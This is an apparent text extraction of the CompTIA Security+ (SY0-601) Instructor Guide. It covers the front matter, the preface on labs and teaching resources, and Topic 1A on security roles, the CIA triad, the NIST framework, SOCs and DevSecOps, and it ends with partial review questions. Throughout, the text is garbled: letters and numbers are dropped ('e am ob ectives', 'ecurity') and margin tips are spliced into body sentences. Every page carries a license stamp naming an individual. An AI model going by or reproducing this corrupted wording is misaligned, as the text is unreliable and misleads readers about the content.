The Official

CompTIA
Security+
Instructor Guide
(Exam SY0-601)
 Course Edition: 1.0

Acknowledgments

James Pengelly, Author

Thomas Reilly, Vice President, Learning
Katie Hoenicke, Director of Product Management
Evan Burns, Senior Manager, Learning Technology Operations and Implementation
James Chesterfield, Manager, Learning Content and Design
Becky Mann, Senior Manager, Product Development
Katherine Keyes, Content Specialist

Notices
Disclaimer
While CompTIA, Inc., takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy,
and all materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of
merchantability or fitness for a particular purpose. The use of screenshots, photographs of another entity's products, or
another entity's product name or service in this book is for editorial purposes only. No such use should be construed to imply
sponsorship or endorsement of the book by nor any affiliation of such entity with CompTIA. This courseware may contain links
to sites on the Internet that are owned and operated by third parties (the "External Sites"). CompTIA is not responsible for
the availability of, or the content located on or through, any External Site. Please contact CompTIA if you have any concerns
regarding such links or External Sites.

Trademark Notice
CompTIA®, Security+®, and the CompTIA logo are registered trademarks of CompTIA, Inc., in the U.S. and other countries.
All other product and service names used may be common law or registered trademarks of their respective proprietors.

Copyright Notice
Copyright © 2020 CompTIA, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. Except as permitted under the Copyright Act of 1976, no part of this publication may be reproduced or distributed
in any form or by any means, or stored in a database or retrieval system, without the prior written permission of CompTIA,
3500 Lacey Road, Suite 100, Downers Grove, IL 60515-5439.
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software
or other products is the responsibility of the user according to terms and conditions of the owner. If you believe that this
book, related materials, or any other CompTIA materials are being reproduced or transmitted without permission, please call
1-866-835-8020 or visit https://help.comptia.org.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Table of Contents | iii

Table of Contents

Lesson 1: Comparing Security Roles and Security Controls........................................ 1

Topic 1A: Compare and Contrast Information Security Roles .......................... 2

Topic 1B: Compare and Contrast Security Control and Framework Types ..... 8

Lesson 2: Explaining Threat Actors and Threat Intelligence .................................... 17

Topic 2A: Explain Threat Actor Types and Attack Vectors .............................. 18

Topic 2B: Explain Threat Intelligence Sources .................................................. 25

Lesson 3: Performing Security Assessments .............................................................. 35

Topic 3A: Assess Organizational Security with Network

Reconnaissance Tools..................................................................................... 36

Topic 3B: Explain Security Concerns with General Vulnerability Types ........ 50

Topic 3C: Summarize Vulnerability Scanning Techniques .............................. 57

Topic 3D: Explain Penetration Testing Concepts.............................................. 67

Lesson 4: Identifying Social Engineering and Malware ............................................. 73

Topic 4A: Compare and Contrast Social Engineering Techniques .................. 74

Topic 4B: Analyze Indicators of Malware-Based Attacks ................................ 82

Lesson 5: Summarizing Basic Cryptographic Concepts ............................................. 95

Topic 5A: Compare and Contrast Cryptographic Ciphers ................................ 96

Topic 5B: Summarize Cryptographic Modes of Operation ............................ 104

Topic 5C: Summarize Cryptographic Use Cases and Weaknesses ................ 111

Topic 5D: Summarize Other Cryptographic Technologies............................. 120

Lesson 6: Implementing Public Key Infrastructure ................................................. 125

Topic 6A: Implement Certificates and Certificate Authorities ..................... 126

Topic 6B: Implement PKI Management ........................................................... 137

Table of Contents

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 iv | Table of Contents

Lesson 7: Implementing Authentication Controls ................................................... 147

Topic 7A: Summarize Authentication Design Concepts ................................ 148

Topic 7B: Implement Knowledge-Based Authentication............................... 154

Topic 7C: Implement Authentication Technologies ....................................... 164

Topic 7D: Summarize Biometrics Authentication Concepts ......................... 172

Lesson 8: Implementing Identity and Account Management Controls................. 179

Topic 8A: Implement Identity and Account Types ......................................... 180

Topic 8B: Implement Account Policies ............................................................ 191

Topic 8C: Implement Authorization Solutions................................................ 199

Topic 8D: Explain the Importance of Personnel Policies ............................... 208

Lesson 9: Implementing Secure Network Designs................................................... 215

Topic 9A: Implement Secure Network Designs .............................................. 216

Topic 9B: Implement Secure Switching and Routing ..................................... 227

Topic 9C: Implement Secure Wireless Infrastructure .................................... 235

Topic 9D: Implement Load Balancers .............................................................. 247

Lesson 10: Implementing Network Security Appliances......................................... 255

Topic 10A: Implement Firewalls and Proxy Servers ....................................... 256

Topic 10B: Implement Network Security Monitoring .................................... 268

Topic 10C: Summarize the Use of SIEM ............................................................ 275

Lesson 11: Implementing Secure Network Protocols .............................................. 283

Topic 11A: Implement Secure Network Operations Protocols ..................... 284

Topic 11B: Implement Secure Application Protocols ..................................... 292

Topic 11C: Implement Secure Remote Access Protocols ............................... 301

Lesson 12: Implementing Host Security Solutions................................................... 317

Topic 12A: Implement Secure Firmware ......................................................... 318

Topic 12B: Implement Endpoint Security ........................................................ 325

Topic 12C: Explain Embedded System Security Implications ........................ 331

Table of Contents

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Table of Contents | v

Lesson 13: Implementing Secure Mobile Solutions ................................................. 343

Topic 13A: Implement Mobile Device Management ...................................... 344

Topic 13B: Implement Secure Mobile Device Connections ........................... 356

Lesson 14: Summarizing Secure Application Concepts ........................................... 365

Topic 14A: Analyze Indicators of Application Attacks ................................... 366

Topic 14B: Analyze Indicators of Web Application Attacks ........................... 372

Topic 14C: Summarize Secure Coding Practices ............................................. 383

Topic 14D: Implement Secure Script Environments ...................................... 390

Topic 14E: Summarize Deployment and Automation Concepts ................... 399

Lesson 15: Implementing Secure Cloud Solutions ................................................... 407

Topic 15A: Summarize Secure Cloud and Virtualization Services ................ 408

Topic 15B: Apply Cloud Security Solutions ...................................................... 418

Topic 15C: Summarize Infrastructure as Code Concepts .............................. 429

Lesson 16: Explaining Data Privacy and Protection Concepts ................................ 437

Topic 16A: Explain Privacy and Data Sensitivity Concepts............................ 438

Topic 16B: Explain Privacy and Data Protection Controls ............................. 447

Lesson 17: Performing Incident Response ................................................................ 455

Topic 17A: Summarize Incident Response Procedures .................................. 456

Topic 17B: Utilize Appropriate Data Sources for Incident Response ........... 465

Topic 17C: Apply Mitigation Controls............................................................... 475

Lesson 18: Explaining Digital Forensics ..................................................................... 483

Topic 18A: Explain Key Aspects of Digital Forensics Documentation .......... 484

Topic 18B: Explain Key Aspects of Digital Forensics Evidence Acquisition .... 490

Lesson 19: Summarizing Risk Management Concepts ............................................ 499

Topic 19A: Explain Risk Management Processes and Concepts ................... 500

Topic 19B: Explain Business Impact Analysis Concepts................................. 508

Table of Contents

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 vi | Table of Contents

Lesson 20: Implementing Cybersecurity Resilience ................................................ 515

Topic 20A: Implement Redundancy Strategies............................................... 516

Topic 20B: Implement Backup Strategies ....................................................... 522

Topic 20C: Implement Cybersecurity Resiliency Strategies .......................... 530

Lesson 21: Explaining Physical Security .................................................................... 539

Topic 21A: Explain the Importance of Physical Site Security Controls ........ 540

Topic 21B: Explain the Importance of Physical Host Security Controls....... 548

Appendix A: Mapping Course Content to CompTIA Security+ (Exam SY0-601) ......A-1

Glossary..........................................................................................................................G-1

Index ................................................................................................................................ I-1

Table of Contents

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 sin The Official om TI Security
Instructor Guide (Exam S
WELCOME TO THE INSTRUCTOR
The Official CompTIA Security+ Instructor and Student Guides (Exam SY0-601) have
been developed by CompTIA for the CompTIA certification candidate. igorously
evaluated by third party sub ect matter e perts to validate ade uate coverage of the
ecurity e am ob ectives, The Official CompTIA Security+ Instructor and Student Guides
teach students the knowledge and skills re uired to assess the security posture of
an enterprise environment and recommend and implement appropriate security
solutions monitor and secure hybrid environments, including cloud, mobile, and IoT
operate with an awareness of applicable laws and policies, including principles of
governance, risk, and compliance identify, analy e, and respond to security events and
incidents and prepare candidates to take the CompTIA ecurity certification e am.
The fficial CompTIA ecurity uides are created around several core principles
including
• Support the Modern Learner The fficial CompTIA ecurity uides are
designed with the modern student and classroom in mind, ensuring success
whether the course format is co located or remote, synchronous or asynchronous,
continuous or modular. Instructors will find best practices and recommendations
within the margin of their Instructor uide specific to the various course formats.

• Focused on Job Roles and Objectives fficial CompTIA uides are organi ed
into Courses, Lessons, and Topics that align training to work in the real world. At the
course level, the content re ects a real ob role, guided by the ob ectives and content
e amples in the CompTIA am b ectives document. Lessons refer to functional
areas within that ob role. Topics within each lesson relate to discrete ob tasks.

• Sound Instructional Design The content within Topics is presented in an

instructional hierarchy that thoughtfully o ers knowledge, procedural tasks, and
hands on Activities that re uire that students put the knowledge they have gained
into practice. This approach keeps the student engaged, ensures success with the
learning outcomes, and reinforces the core concepts to ensure long term retention
of new ideas.

Preparing to Teach
The course covers the following themes
• Threat intelligence and security assessment Lessons .

• Cryptography and IAM Lessons .

• rotecting network infrastructure Lessons .

• rotecting applications and cloud services Lessons .

• Incident response and risk management Lessons .

In addition, incident response has been e panded and moved toward the end of the
course. In addition, physical site security is now covered at the end of the course.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 viii | Instructor Preface

Easily Implemented in Classroom Environments

The content and resources in the ecurity course have been reworked to
make them more e ible to suit a variety of classroom formats, whether there are
days or weeks to teach the material
• Lengthy on-premise Lab Activities that require organizations to setup and
maintain equipment have been removed from the course. Instead, graded labs
CertMaster Labs are available hosted on the Learn on Demand ystems platform.
These modular labs re uire only a modern browser and internet connection, saving
organi ations hours of setup time. Their short durations of minutes allow
for labs to be more easily integrated in coursework. As a result, instructors will no
longer see the setup guide in the Instructor esources.

• Reworked Presentation Tools: The number of ower oint lecture slides has been
vastly reduced as compared with , while supporting ower oint notes and
resentation lanners have been enhanced, making it easier for instructors to plan
lectures and use classroom time e ectively.

Teaching Resources for Teaching

Tip
The CompTIA Learning Center is an intuitive online platform that provides access to the
A Teaching Tip icon
provides additional e ook and all accompanying resources to support The fficial CompTIA curriculum. An
guidance and access key to the CompTIA Learning Center is delivered upon purchase of the print or
background that you e ook.
may want to utilize
during specific parts of • Instructor Tips: Throughout the Instructor uide, you will see in the margins
the course, including various instructor focused icons that provide suggestions, answers to problems, and
timings and emphasis. supplemental information for you, the instructor. The te t under these icons is not
included in the tudent uide. These notes are also included in the notes section of
Interaction the instructor ower oint deck for easy reference while teaching.
Opportunity
An Interaction • Resources: upporting materials for instructors are available for downloading from
Opportunity provides the esources menu. In addition to course specific delivery tips, and solutions to
suggestions for different activities and discussion uestions, instructors also have access to
ways to engage with
students, either through • PowerPoint Slides: A complete set of ower oint slides is provided to facilitate
discussions, activities, the class, including lists, tables, diagrams, illustrations, and annotated screens, as
or demonstrations. well as Activity summaries.
Show Slide(s) • Presentation Planners: everal resentation lanners are provided in the
esources menu. The lanners help the instructor plan the class schedule and
The Show Slide icon include e amples of schedules for di erent course lengths, whether courses are
provides a prompt to continuous or o ered separately across a multisession series.
display a specific slide
from the provided • Transition Guide: A detailed guide with information on how the e am ob ectives
PowerPoint files. and training content have changed from to .

• Videos: ideos complement the reading by providing short, engaging

demonstrations of key activities in the course.

• Assessments: ractice uestions help to verify a student s understanding of

the material for each Lesson. Answers and feedback can be reviewed after each
uestion, or at the end of the assessment. A timed inal Assessment provides a
practice test like e perience to help students determine their readiness for the
CompTIA certification e am. tudents can review correct answers and full feedback
after attempting the inal Assessment.

The CompTIA Learning Center can be accessed at learn.comptia.org.

Using The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Instructor Preface | ix

CertMaster Labs
CertMaster Labs allow students to learn in actual software applications through a
remote lab environment. The labs align with The Official CompTIA Instructor and Student
Guides and allow students to practice what they are learning using real, hands on
e periences. All lab activities include gradable assessments, o er feedback and hints,
and provide a score based on learner inputs. tudents have access to the software
environment for months after they redeem their access key, providing a fantastic
resource for students to practice their skills. eatures of CertMaster Labs include
• Browser-based The labs can be accessed with a browser and internet connection,
making the setup process easy and enabling remote students to use the materials
without having to secure any special e uipment or software.

• Use Real Equipment and Software The labs use virtual machines configured
with actual software applications and operating systems allowing for e ibility in
approaching the lab tasks and replicating the e perience students will encounter in
a ob role.

• Graded Labs Lab activities will more accurately assess a student s ability to
perform tasks because they will get a score on their work and will surface that
information to instructors.

• Modular The labs within each course are independent of each other and can be
used in any order.

• Designed for Skills Development The labs help students gain e perience
with the practical tasks that will be e pected of them in a ob role and on the
performance based items found on CompTIA certification e ams.

• Ali ned ith cial CompTIA Content The labs are based on the content within
The fficial CompTIA Instructor and tudent uides, providing a consistent and
seamless e perience for students to both gain knowledge and practice skills

• Ability to Save Work tudents can save their work in labs for hours to allow
for more e ibility in how labs are implemented in coursework.

Lab Activities
ands on activities have been redesigned to take advantage of the virtual environment.
All lab activities include gradable assessments, o er feedback and hints, and provide a
score based on learner inputs. There are two types of labs
• Assisted Labs provide detailed steps with graded assessment and feedback for the
completion of each task. These labs are shorter, focus on a specific task and typically
take minutes to complete.

• Applied Labs are longer activities that provide a series of goal oriented scenarios
with graded assessment and feedback based on a learner s ability to complete each
goal successfully. Applied labs are typically minutes long and cover multiple
tasks a student has learned over the course of several lessons.

ind more information about CertMaster Labs and how to purchase them at
store.comptia.org.

Presentation Planners
ithin the instructional design hierarchy, the course structure tries to follow the
e am ob ectives domain structure as far as possible, but some ob ectives and content
e amples are split between multiple lessons and topics so as to make the topics ow

Using The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 x | Instructor Preface

better and to eliminate duplications. The course is designed to be as modular as

possible, so that you can use the content as e ibly as you wish.
resentation planners are available to download from the CompTIA Learning Center
on the Resources page. ecause the content can be presented in a continuous ow
or separately across a multisession series, several sample timetables are provided.
ou can use these sample planners to determine how you will conduct the class to
meet the needs of your own situation. A presentation planner helps you to structure
the course by indicating the ma imum amount of time you should spend on any one
topic or activity. ou will need to ad ust these timings to suit your audience. our
presentation timing and ow may vary based on factors such as the si e of the class,
whether students are in speciali ed ob roles, whether you plan to incorporate videos
or other assets from the CompTIA Learning Center into the course, and so on.
ith the latest revision of the certification e ams and corresponding e am ob ectives,
a significant amount of new content has been added to this edition of the course. ou
might need to employ time saving techni ues. Detailed notes are provided as Teaching
Tips at the start of each lesson and topic, but consider the following general time
saving strategies
• ome topics will re uire more detailed presentation, with use of the slide deck.
thers, such as those that are well covered by prere uisite certifications, would
suit a less formal style where you use uestioning and lead a discussion to check
students e isting understanding. ome topics may be suitable for self study, but
if students have concerns about this, you will have to reduce the amount of lab
activities to compensate.

• Ask participants to preread some of the content as homework to reduce class time
spent on that topic.

• ummari e a topic in overview, and then answer uestions during a later session
when students have had a chance to study it in more detail.

• Consider a lab first approach to selected topics, referring students to the study
content for review later.

If students are struggling with lab activities, consider some of the following approaches
• Demonstrate a lab as a walkthrough.

• et students to partner up to complete a lab, with one student completing the steps
and the other student advising and checking.

• ummari e the remaining parts of a lab if students do not have time to finish in
class.

Using The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 About This Course
CompTIA is a not for profit trade association with the purpose of advancing the Teaching
interests of IT professionals and IT channel organi ations and its industry leading IT Tip
certifications are an important part of that mission. CompTIA's ecurity certification is Take some time at the
a foundation level certificate designed for IT administrators with two years' e perience start of the course for
whose ob role is focused on system security. students to introduce
themselves and
The CompTIA ecurity e am will certify the successful candidate has the knowledge identify the outcomes
and skills re uired to assist with cybersecurity duties in small and large organi ations. they hope to achieve
These duties include assessments and monitoring secure network, host, app, and by studying the
cloud provisioning data governance and incident analysis and response. course.

CompTIA Security+ is the first security certification IT professionals should earn. It

establishes the core knowledge re uired of any cybersecurity role and provides a
springboard to intermediate-level cybersecurity obs. Security+ incorporates best
practices in hands-on troubleshooting to ensure security professionals have practical
security problem-solving skills. Cybersecurity professionals with Security+ know how to
address security incidents not ust identify them.
Security+ is compliant with ISO 1 0 standards and approved by the US o to meet
directive 1 0 0.01- re uirements. egulators and government rely on A SI
accreditation because it provides confidence and trust in the outputs of an accredited
program.
comptia.org certifications security

Course Description
Course Objectives
This course can benefit you in two ways. If you intend to pass the CompTIA ecurity
am certification e amination, this course can be a significant part of your
preparation. ut certification is not the only key to professional success in the field of
computer security. Today's ob market demands individuals with demonstrable skills,
and the information and activities in this course can help you build your cybersecurity
skill set so that you can confidently perform your duties in any entry level security role.
n course completion, you will be able to
• Compare security roles and security controls

• plain threat actors and threat intelligence

• erform security assessments and identify social engineering attacks and malware
types

• ummari e basic cryptographic concepts and implement public key infrastructure

• Implement authentication controls

• Implement identity and account management controls

• Implement secure network designs, network security appliances, and secure

network protocols

• Implement host, embedded Internet of Things, and mobile security solutions

• Implement secure cloud solutions

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 xii | Preface

• plain data privacy and protection concepts

• erform incident response and digital forensics

• ummari e risk management concepts and implement cybersecurity resilience

• plain physical security

Target Student
The Official CompTIA Security+ Guide (Exam SY0-601) is the primary course you will need
to take if your ob responsibilities include securing network services, devices, and data
confidentiality privacy in your organi ation. ou can take this course to prepare for the
CompTIA ecurity am certification e amination.

Prerequisites
• To ensure your success in this course, you should have basic indows and Linu
administrator skills and the ability to implement fundamental networking appliances
and I addressing concepts. CompTIA A and Network certifications, or e uivalent
knowledge, and si to nine months' e perience in networking, including configuring
security parameters, are strongly recommended.

The prere uisites for this course might differ significantly from the prere uisites for
the CompTIA certification exams. or the most up-to-date information about the exam
prere uisites, complete the form on this page comptia.org training resources exam-
ob ectives

How to Use the Study Notes

The following notes will help you understand how the course structure and
components are designed to support mastery of the competencies and tasks
associated with the target ob roles and help you to prepare to take the certification
e am.

As You Learn
At the top level, this course is divided into lessons, each representing an area of
competency within the target ob roles. ach lesson is composed of a number of topics.
A topic contains sub ects that are related to a discrete ob task, mapped to ob ectives
and content e amples in the CompTIA e am ob ectives document. ather than follow
the e am domains and ob ectives se uence, lessons and topics are arranged in order
of increasing proficiency. ach topic is intended to be studied within a short period
typically minutes at most . ach topic is concluded by one or more activities,
designed to help you to apply your understanding of the study notes to practical
scenarios and tasks.
Additional to the study content in the lessons, there is a glossary of the terms and
concepts used throughout the course. There is also an inde to assist in locating
particular terminology, concepts, technologies, and tasks within the lesson and topic
content.

In many electronic versions of the book, you can click links on key words in the topic content
to move to the associated glossary definition, and on page references in the index to move
to that term in the content. To return to the previous location in the document after clicking
a link, use the appropriate functionality in your e ook viewing software.

About This Course

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Preface | xiii

atch throughout the material for the following visual cues.

Student Icon Student Icon Descriptive Text

A Note provides additional information, guidance, or hints about a to-
pic or task.

A Caution note makes you aware of places where you need to be par-
ticularly careful with your actions, settings, or decisions so that you can
be sure to get the desired results of an activity or task.

As You Review
Any method of instruction is only as e ective as the time and e ort you, the student,
are willing to invest in it. In addition, some of the information that you learn in class
may not be important to you immediately, but it may become important later. or this
reason, we encourage you to spend some time reviewing the content of the course
after your time in the classroom.
ollowing the lesson content, you will find a table mapping the lessons and topics to
the e am domains, ob ectives, and content e amples. ou can use this as a checklist as
you prepare to take the e am, and review any content that you are uncertain about.

As a Reference
The organi ation and layout of this book make it an easy to use resource for future
reference. uidelines can be used during class and as after class references when
you're back on the ob and need to refresh your understanding. Taking advantage of
the glossary, inde , and table of contents, you can use this book as a first source of
definitions, background information, and summaries.

How to Use the CompTIA Learning Center

The CompTIA Learning Center is an intuitive online platform that provides access to the
e ook and all accompanying resources to support The fficial CompTIA curriculum. An
access key to the CompTIA Learning Center is delivered upon purchase of the e ook.
esources include
• Online Reader: An interactive online reader provides the ability to search, highlight,
take notes, and bookmark passages in the e ook. tudents can also access the
e ook through the CompTIA Learning Center e eader mobile app.

• Videos: ideos complement the reading by providing short, engaging

demonstrations of key activities in the course.

• Assessments: ractice uestions help to verify a student s understanding of

the material for each Lesson. Answers and feedback can be reviewed after each
uestion, or at the end of the assessment. A timed inal Assessment provides a
practice test like e perience to help students determine their readiness for the
CompTIA certification e am. tudents can review correct answers and full feedback
after attempting the inal Assessment.

• Strengths and Weaknesses Dashboard: The trengths and eaknesses

Dashboard provides you with a snapshot of your performance. Data ows into
the dashboard from your practice uestions, final assessment scores, and your
indicated confidence levels throughout the course.

The CompTIA Learning Center can be accessed at learn.comptia.org.

About This Course

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 1
Comparing Security Roles and
Security Controls

LESSON INTRODUCTION Teaching

Tip
Security is an ongoing process that includes assessing requirements, setting up This lesson aims to
organizational security systems, hardening them, monitoring them, responding to establish the conte t
attacks in progress, and deterring attackers. As a security professional, it is important for the security
that you understand how the security function is implemented as departments or units role and introduce
and professional roles within di erent types of organi ations. ou must also be able to the concepts of
security controls and
e plain the importance of compliance factors and best practice frameworks in driving
frameworks.
the selection of security controls.

Lesson Objectives
In this lesson, you will:
• Compare and contrast information security roles.

• Compare and contrast security control and framework types.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 2 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 1A
Compare and Contrast Information
Security Roles
Teaching EXAM OBJECTIVES COVERED
Tip This topic provides background information about the role of security professionals and
This topic introduces does not cover a specific exam ob ective.
the concept of
the CIA triad and
discusses roles and To be successful and credible as a security professional, you should understand
responsibilities in security in business starting from the ground up. ou should also know the key security
typical information terms and ideas used by other security e perts in technical documents and in trade
security teams. This
publications. ecurity implementations are constructed from fundamental building
topic does not align
to specific ob ectives, blocks, ust like a large building is constructed from individual bricks. This topic will help
but it does cover you understand those building blocks so that you can use them as the foundation for
some terminology your security career.
from the acronyms
list. ou can skip this
topic if students are Information Security
familiar with these
basic concepts and Information security (or infosec) refers to the protection of data resources from
terminology and you unauthori ed access, attack, theft, or damage. Data may be vulnerable because of
would prefer to move the way it is stored, the way it is transferred, or the way it is processed. The systems
uickly to covering used to store, transmit, and process data must demonstrate the properties of security.
syllabus content.
Secure information has three properties, often referred to as the CIA Triad
ho lide s • Confidentialit means that certain information should only be known to certain
people.
Information Security
• Integrity means that the data is stored and transferred as intended and that any
Teaching modification is authori ed.
Tip
• A aila ilit means that information is accessible to those authori ed to view or
Make sure that
students can
modify it.
di erentiate the
goals of providing
The triad can also be referred to as "AIC" to avoid confusion with the Central Intelligence
confidentiality,
integrity, and
Agency.
availability and non
repudiation). Note
that the property of
availability should not Some security models and researchers identify other properties that secure systems
be overlooked. should e hibit. The most important of these is non repudiation. Non-repudiation
An alternative means that a sub ect cannot deny doing something, such as creating, modifying, or
acronym is sending a resource. or e ample, a legal document, such as a will, must usually be
AIN rivacy, witnessed when it is signed. If there is a dispute about whether the document was
Authentication, correctly e ecuted, the witness can provide evidence that it was.
Integrity, Non
Repudiation). We will
discuss security versus
privacy later in the
course.

esson 1 Comparing Security oles and Security Controls | Topic 1A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 3

Cybersecurity Framework ho lide s

ithin the goal of ensuring information security, cybersecurity refers specifically Cybersecurity
to provisioning secure processing hardware and software. Information security Framework
and cybersecurity tasks can be classified as five functions, following the framework
developed by the ational Institute o tandards and Technolo I T (nist.gov Teaching
cyberframework online learning five functions): Tip
Use these functions
• Identify develop security policies and capabilities. valuate risks, threats, and
to give students
vulnerabilities and recommend security controls to mitigate them. an overview of
typical cybersecurity
• rotect procure develop, install, operate, and decommission IT hardware and operations.
software assets with security as an embedded re uirement of every stage of this Make sure students
operations life cycle. are familiar with the
work of NIST. Note
• Detect perform ongoing, proactive monitoring to ensure that controls are e ective also that links in the
and capable of protecting against new types of threats. course will often
include sites and
• Respond—identify, analyze, contain, and eradicate threats to systems and data white papers with
security. considerable amounts
of additional detail.
• ecover implement cybersecurity resilience to restore systems and data if other This detail is not
controls are unable to prevent attacks. necessary to learn for
the exam.
tart to develop
the idea that
cybersecurity is
adversarial in nature,
with threat actors
continually seeking
new advantages over
defensive systems.

Core cybersecurity tasks.

ho lide s

Information Security Competencies Information Security

Competencies
IT professionals working in a role with security responsibilities must be competent in
a wide range of disciplines, from network and application design to procurement and
Interaction
human resources . The following activities might be typical of such a role
Opportunity
• Participate in risk assessments and testing of security systems and make If appropriate,
recommendations. ask students what
security relevant
• pecify, source, install, and configure secure devices and software. duties they have
in their current
• et up and maintain document access control and user privilege profiles. employment.

esson 1 Comparing Security oles and Security Controls | Topic 1A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 4 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• Monitor audit logs, review user privileges, and document access controls.

• Manage security related incident response and reporting.

• Create and test business continuity and disaster recovery plans and procedures.

• Participate in security training and education programs.

ho lide s In ormation ecurit oles and esponsi ilities

Information
A security policy is a formali ed statement that defines how security will be
Security Roles and implemented within an organi ation. It describes the means the organi ation will
esponsibilities take to protect the confidentiality, availability, and integrity of sensitive data and
resources. It often consists of multiple individual policies. The implementation of a
Interaction security policy to support the goals of the CIA triad might be very di erent for a school,
Opportunity a multinational accountancy firm, or a machine tool manufacturer. owever, each of
Discuss how these organizations, or any other organization (in any sector of the economy, whether
responsibility for profit making or non profit making should have the same interest in ensuring that its
security might need employees, e uipment, and data are secure against attack or damage.
to be clarified when
there is a specialist As part of the process of adopting an e ective organi ational security posture,
security function employees must be aware of their responsibilities. The structure of security
combining with the responsibilities will depend on the si e and hierarchy of an organi ation, but these
responsibilities of
roles are typical.
di erent department
managers. • verall internal responsibility for security might be allocated to a dedicated
department, run by a Director of ecurity, Chief ecurity fficer C , or Chief
In ormation ecurit cer CI . istorically, responsibility for security
might have been allocated to an e isting business unit, such as Information and
Communications Technology ICT or accounting.

owever, the goals of a network manager are not always well aligned with the
goals of security network management focuses on availability over confidentiality.
Conse uently, security is increasingly thought of as a dedicated function or business
unit with its own management structure.

• Managers may have responsibility for a domain, such as building control, ICT, or
accounting.

• Technical and specialist sta have responsibility for implementing, maintaining, and
monitoring the policy. ecurity might be made a core competency of systems and
network administrators, or there may be dedicated security administrators. ne
such ob title is In ormation stems ecurit cer I .

• Non technical sta have the responsibility of complying with policy and with any
relevant legislation.

• ternal responsibility for security due care or liability lies mainly with directors
or owners, though again it is important to note that all employees share some
measure of responsibility.

IST s ational Initiative for Cybersecurity Education ( ICE) categorizes ob tasks and ob
roles within the cybersecurity industry (gov itl applied-cybersecurity nice nice-framework-
resource-center).

esson 1 Comparing Security oles and Security Controls | Topic 1A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 5

Information Security Business Units ho lide s

The following units are ofen used to represent the security function within the Information Security
organizational hierarchy. usiness nits

ecurit perations Center C Teaching

Tip
A securit operations center C is a location where security professionals
Students should learn
monitor and protect critical information assets across other business functions, such this terminology,
as finance, operations, sales marketing, and so on. ecause Cs can be difficult to drawn from the
establish, maintain, and finance, they are usually employed by larger corporations, like acronym list. Note
a government agency or a healthcare company. the advice in the
syllabus document
"Candidates are
encouraged to review
the complete list
and attain a working
knowledge of all listed
acronyms as part of a
comprehensive e am
preparation program."

Interaction
Opportunity
If appropriate,
discuss how the
security function is
represented in the
students' workplaces.
Do any students
currently work in a
SOC or participate in
Dev ec ps pro ects

I Security ead uarters in Cambridge A. (Image credit ohn attern eature

Photo Service for I .)

DevSecOps
Network operations and use of cloud computing make ever increasing use of
automation through software code. Traditionally, software code would be the
responsibility of a programming or development team. eparate development and
operations departments or teams can lead to silos, where each team does not work
e ectively with the other.
e elopment and operations e ps is a cultural shift within an organization to
encourage much more collaboration between developers and system administrators.
y creating a highly orchestrated environment, IT personnel and developers can build,
test, and release software faster and more reliably. Many consider a Dev ps approach
to administration as the only way organi ations can take full advantage of the potential
benefits o ered by cloud service providers.

esson 1 Comparing Security oles and Security Controls | Topic 1A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 6 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Dev ec ps e tends the boundary to security specialists and personnel, re ecting

the principle that security is a primary consideration at every stage of software
development and deployment. This is also known as shift left, meaning that security
considerations need to be made during re uirements and planning phases, not grafted
on at the end. The principle of Dev ec ps recogni es this and shows that security
e pertise must be embedded into any development pro ect. Ancillary to this is the
recognition that security operations can be conceived of as software development
pro ects. ecurity tools can be automated through code. Conse uently, security
operations need to take on developer e pertise to improve detection and monitoring.

Incident Response
A dedicated c er incident response team CI T computer security incident
response team C I T computer emergency response team C T as a single point of
contact for the notification of security incidents. This function might be handled by the
C or it might be established as an independent business unit.

esson 1 Comparing Security oles and Security Controls | Topic 1A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 7

Review Activity:
Information Security Roles
Teaching
Answer the following questions:
Tip
ou can either
complete the review
questions in class with
1. What are the properties of a secure information processing system? the students or simply
make them aware of
Confidentiality, Integrity, and Availability and Non repudiation . them as resources to
use as they review the
2. What term is used to describe the property of a secure network where a course material before
sender cannot deny having sent a message? the exam.

Non repudiation.

3. A multinational compan mana es a lar e amount o alua le intellectual

propert I data plus personal data or its customers and account holders
What type of business unit can be used to manage such important and
comple securit re uirements

A security operations center (SOC).

4. A usiness is e pandin rapidl and the o ner is orried a out tensions

et een its esta lished IT and pro rammin di isions hat t pe o securit
usiness unit or unction could help to resol e these issues

